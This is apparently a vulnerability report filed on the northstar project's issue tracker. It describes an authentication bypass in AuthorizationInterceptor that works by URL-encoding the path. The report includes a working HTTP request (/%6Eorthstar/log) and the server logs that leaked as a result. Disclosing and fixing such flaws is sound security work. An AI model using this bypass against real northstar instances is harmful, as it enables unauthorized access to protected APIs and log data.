[Bug]: There is an Incorrect Access Control vulnerability in northstar

### 这个问题是否已经存在？

- [x] 我已经搜索过现有的问题 (https://gitee.com/dromara/northstar/issues)

### 如何复现

1. version: <= v7.3.5 (commit 2ab1f621ac0a93e4a05b99f1430f9a1a3ebf0e8b)
2. problem: There is an authentication bypass vulnerability in northstar. An attacker can exploit this vulnerability to access `/northstar/*` API without any token.
3. source code analysis: 
   - The affected source code class is `org.dromara.northstar.web.interceptor.AuthorizationInterceptor`, and the affected function is `preHandle`. In the filter code, use `request.getRequestURI()` to obtain the request path, and then determine whether the `path` startsWith `/northstar/auth/login` but not startWith `/northstar`, etc. If the condition is met, it will execute `return true` to bypass the Interceptor. Otherwise, it will block the current request.
    
![输入图片说明](https://foruda.gitee.com/images/1749090709430876944/9e008218_8584491.png "屏幕截图")

- The problem lies in using `request.getRequestURI()` to obtain the request path. The path obtained by this function will not parse special symbols, but will be passed on directly, so you can use URL encoding to bypass it.

- Taking one of the backend interfaces `/northstar/log` as an example, using `/%6Eorthstar/log` can make it bypass the `AuthorizationInterceptor`, and at the same time, it allows the log content leak.
   
4. reproduce the vulnerablitity
```
GET /%6Eorthstar/log?positionOffset=0&tailNumOfLines=100 HTTP/1.1
Host: 127.0.0.1:80
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: 127.0.0.1:80
Connection: keep-alive
Cookie: JSESSIONID=3423C5F9E5AC5521378700D5EB2E0665
```

### 预期结果

{
    "timestamp": 1749090153426,
    "status": 401,
    "error": "Unauthorized",
    "path": "/northstar/log"
}

### 实际结果

{
    "status": 200,
    "message": null,
    "data": {
        "startPosition": 0,
        "endPosition": 31649,
        "linesOfLog": [
            "2025-06-05T10:19:35.772+08:00  INFO 40545 --- [main] .s.d.r.c.RepositoryConfigurationDelegate : Bootstrapping Spring Data JPA repositories in DEFAULT mode.",
            "2025-06-05T10:19:35.802+08:00  INFO 40545 --- [main] .s.d.r.c.RepositoryConfigurationDelegate : Finished Spring Data repository scanning in 25 ms. Found 9 JPA repository interfaces.",
            "2025-06-05T10:19:36.151+08:00  INFO 40545 --- [main] o.d.n.config.SocketIOServerConfig        : 自动装配SocketIOServerAutoConfiguration",
            "2025-06-05T10:19:36.151+08:00  WARN 40545 --- [main] trationDelegate$BeanPostProcessorChecker : Bean 'socketIOServerConfig' of type [org.dromara.northstar.config.SocketIOServerConfig$$SpringCGLIB$$0] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying). The currently created BeanPostProcessor [springAnnotationScanner] is declared through a non-static factory method on that class; consider declaring it as static instead.",
            "2025-06-05T10:19:36.201+08:00  INFO 40545 --- [main] c.c.socketio.SocketIOServer              : Session store / pubsub factory used: MemoryStoreFactory (local session store only)",
            "2025-06-05T10:19:36.280+08:00  INFO 40545 --- [nioEventLoopGroup-2-1] c.c.socketio.SocketIOServer              : SocketIO server started at port: 51688",
            "2025-06-05T10:19:36.281+08:00  WARN 40545 --- [main] trationDelegate$BeanPostProcessorChecker : Bean 'socketIOServer' of type [com.corundumstudio.socketio.SocketIOServer] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying). Is this bean getting eagerly injected into a currently created BeanPostProcessor [springAnnotationScanner]? Check the corresponding BeanPostProcessor declaration and its dependencies.",
            "2025-06-05T10:19:36.463+08:00  INFO 40545 --- [main] o.s.b.w.embedded.tomcat.TomcatWebServer  : Tomcat initialized with port 80 (http)",
            "2025-06-05T10:19:36.469+08:00  INFO 40545 --- [main] o.apache.catalina.core.StandardService   : Starting service [Tomcat]",
            "2025-06-05T10:19:36.469+08:00  INFO 40545 --- [main] o.apache.catalina.core.StandardEngine    : Starting Servlet engine: [Apache Tomcat/10.1.16]",
            "2025-06-05T10:19:36.501+08:00  INFO 40545 --- [main] o.a.c.c.C.[Tomcat].[localhost].[/]       : Initializing Spring embedded WebApplicationContext",
            "2025-06-05T10:19:36.502+08:00  INFO 40545 --- [main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 1142 ms",
            "2025-06-05T10:19:36.524+08:00  INFO 40545 --- [main] com.zaxxer.hikari.HikariDataSource       : HikariPool-1 - Starting...",
            "2025-06-05T10:19:36.692+08:00  INFO 40545 --- [main] com.zaxxer.hikari.pool.HikariPool        : HikariPool-1 - Added connection conn0: url=jdbc:h2:file:./data/storage user=SA",
            "2025-06-05T10:19:36.694+08:00  INFO 40545 --- [main] com.zaxxer.hikari.HikariDataSource       : HikariPool-1 - Start completed.",
            "2025-06-05T10:19:36.700+08:00  INFO 40545 --- [main] o.s.b.a.h2.H2ConsoleAutoConfiguration    : H2 console available at '/h2-console'. Database available at 'jdbc:h2:file:./data/storage'",
            "2025-06-05T10:19:36.706+08:00  INFO 40545 --- [main] org.dromara.northstar.config.AppConfig   : 设置全局环境信息",
            "2025-06-05T10:19:37.061+08:00  INFO 40545 --- [main] org.ehcache.core.EhcacheManager          : Cache 'bars' created in EhcacheManager.",
            "2025-06-05T10:19:37.077+08:00  INFO 40545 --- [main] org.ehcache.jsr107.Eh107CacheManager     : Registering Ehcache MBean javax.cache:type=CacheStatistics,CacheManager=file./Users/racerz/Desktop/Auth/URLFuzz/benchmark/northstar/northstar-main/target/classes/ehcache.xml,Cache=bars",
            "2025-06-05T10:19:37.146+08:00  INFO 40545 --- [main] o.hibernate.jpa.internal.util.LogHelper  : HHH000204: Processing PersistenceUnitInfo [name: default]",
            "2025-06-05T10:19:37.191+08:00  INFO 40545 --- [main] org.hibernate.Version                    : HHH000412: Hibernate ORM core version 6.3.1.Final",
            "2025-06-05T10:19:37.216+08:00  INFO 40545 --- [main] o.h.c.internal.RegionFactoryInitiator    : HHH000026: Second-level cache disabled",
            "2025-06-05T10:19:37.390+08:00  INFO 40545 --- [main] o.s.o.j.p.SpringPersistenceUnitInfo      : No LoadTimeWeaver setup: ignoring JPA class transformer",
            "2025-06-05T10:19:37.428+08:00  WARN 40545 --- [main] org.hibernate.orm.deprecation            : HHH90000025: H2Dialect does not need to be specified explicitly using 'hibernate.dialect' (remove the property setting and it will be selected by default)",
            "2025-06-05T10:19:38.048+08:00  INFO 40545 --- [main] o.h.e.t.j.p.i.JtaPlatformInitiator       : HHH000489: No JTA platform available (set 'hibernate.transaction.jta.platform' to enable JTA platform integration)",
            "2025-06-05T10:19:38.069+08:00  INFO 40545 --- [main] j.LocalContainerEntityManagerFactoryBean : Initialized JPA EntityManagerFactory for persistence unit 'default'",
            "2025-06-05T10:19:38.076+08:00  INFO 40545 --- [main] o.dromara.northstar.config.CacheConfig   : 启用缓存管理",
            "2025-06-05T10:19:38.088+08:00  INFO 40545 --- [main] o.d.n.event.DisruptorFastEventEngine     : 启动事件引擎",
            "2025-06-05T10:19:38.375+08:00  INFO 40545 --- [main] c.c.s.a.SpringAnnotationScanner          : broadcastEventHandler bean listeners added",
            "2025-06-05T10:19:38.682+08:00  WARN 40545 --- [main] JpaBaseConfiguration$JpaWebConfiguration : spring.jpa.open-in-view is enabled by default. Therefore, database queries may be performed during view rendering. Explicitly configure spring.jpa.open-in-view to disable this warning",
            "2025-06-05T10:19:38.700+08:00  INFO 40545 --- [main] o.s.b.a.w.s.WelcomePageHandlerMapping    : Adding welcome page: class path resource [static/index.html]",
            "2025-06-05T10:19:38.970+08:00  INFO 40545 --- [main] o.s.b.w.embedded.tomcat.TomcatWebServer  : Tomcat started on port 80 (http) with context path ''",
            "2025-06-05T10:19:38.980+08:00  INFO 40545 --- [main] o.d.northstar.NorthstarApplication       : Started NorthstarApplication in 4.005 seconds (process running for 4.551)",
            "2025-06-05T10:19:38.982+08:00  INFO 40545 --- [main] o.d.n.gateway.GatewayMetaProvider        : 注册 [SIM] 渠道元信息",
            "2025-06-05T10:19:38.982+08:00  INFO 40545 --- [main] o.d.n.gateway.GatewayMetaProvider        : 注册 [PLAYBACK] 渠道元信息",
            "2025-06-05T10:19:38.983+08:00  INFO 40545 --- [main] o.d.n.gateway.playback.PlaybackLoader    : 加载回测合约",
            "2025-06-05T10:19:41.130+08:00  INFO 40545 --- [main] o.d.n.web.service.GatewayService         : 开始加载网关",
            "2025-06-05T10:19:41.182+08:00  INFO 40545 --- [main] o.d.n.web.service.GatewayService         : 等待网关合约加载",
            "2025-06-05T10:19:51.201+08:00  INFO 40545 --- [main] o.d.n.web.service.GatewayService         : 网关加载完毕",
            "2025-06-05T10:19:51.203+08:00  INFO 40545 --- [main] o.d.northstar.web.service.ModuleService  : 开始加载模组",
            "2025-06-05T10:19:51.212+08:00  INFO 40545 --- [main] o.d.northstar.web.service.ModuleService  : 模组加载完毕",
            "2025-06-05T10:19:51.213+08:00  INFO 40545 --- [main] org.dromara.northstar.config.AppConfig   : Version: 7.3.5, Build Time: 2025-06-05T10:05:04.360+08:00",
            "2025-06-05T10:20:00.187+08:00  INFO 40545 --- [tomcat-handler-0] o.a.c.c.C.[Tomcat].[localhost].[/]       : Initializing Spring DispatcherServlet 'dispatcherServlet'",
            "2025-06-05T10:20:00.188+08:00  INFO 40545 --- [tomcat-handler-0] o.s.web.servlet.DispatcherServlet        : Initializing Servlet 'dispatcherServlet'",
            "2025-06-05T10:20:00.194+08:00  INFO 40545 --- [tomcat-handler-0] o.s.web.servlet.DispatcherServlet        : Completed initialization in 5 ms",
            "2025-06-05T10:20:00.231+08:00  WARN 40545 --- [tomcat-handler-0] o.d.n.w.i.AuthorizationInterceptor       : token校验失败，IP：127.0.0.1",
            "2025-06-05T10:20:11.140+08:00  WARN 40545 --- [tomcat-handler-2] o.d.n.w.i.AuthorizationInterceptor       : token校验失败，IP：127.0.0.1",
            "2025-06-05T10:21:40.125+08:00 ERROR 40545 --- [tomcat-handler-4] o.d.n.w.r.common.CommonControllerAdvice  : Optional long parameter 'positionOffset' is present but cannot be translated into a null value due to being declared as a primitive type. Consider declaring it as object wrapper for the corresponding primitive type.",
            "java.lang.IllegalStateException: Optional long parameter 'positionOffset' is present but cannot be translated into a null value due to being declared as a primitive type. Consider declaring it as object wrapper for the corresponding primitive type.",
            "\tat org.springframework.web.method.annotation.AbstractNamedValueMethodArgumentResolver.handleNullValue(AbstractNamedValueMethodArgumentResolver.java:269)",
            "\tat org.springframework.web.method.annotation.AbstractNamedValueMethodArgumentResolver.resolveArgument(AbstractNamedValueMethodArgumentResolver.java:127)",
            "\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)",
            "\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:218)",
            "\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:171)",
            "\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:118)",
            "\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:917)",
            "\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:829)",
            "\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)",
            "\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1089)",
            "\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:979)",
            "\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1014)",
            "\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:903)",
            "\tat jakarta.servlet.http.HttpServlet.service(HttpServlet.java:564)",
            "\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:885)",
            "\tat jakarta.servlet.http.HttpServlet.service(HttpServlet.java:658)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:205)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)",
            "\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)",
            "\tat org.springframework.web.filter.CorsFilter.doFilterInternal(CorsFilter.java:91)",
            "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)",
            "\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)",
            "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)",
            "\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)",
            "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)",
            "\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)",
            "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)",
            "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)",
            "\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:167)",
            "\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:90)",
            "\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:482)",
            "\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:115)",
            "\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:93)",
            "\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)",
            "\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:340)",
            "\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:391)",
            "\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)",
            "\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896)",
            "\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744)",
            "\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)",
            "\tat java.base/java.lang.VirtualThread.run(VirtualThread.java:329)",
            "2025-06-05T10:22:33.423+08:00  WARN 40545 --- [tomcat-handler-7] o.d.n.w.i.AuthorizationInterceptor       : token校验失败，IP：127.0.0.1"
        ]
    }
}

### 截图或视频

- nomal request

![输入图片说明](https://foruda.gitee.com/images/1749090800874815259/4afd6ef1_8584491.png "屏幕截图")

- attack request

![输入图片说明](https://foruda.gitee.com/images/1749090821747293125/ee57a623_8584491.png "屏幕截图")

### 问题版本号

v7.3.5 (master branch)

GVP dromara/northstar

内容风险标识

评论 (1)

GVPdromara/northstar

内容风险标识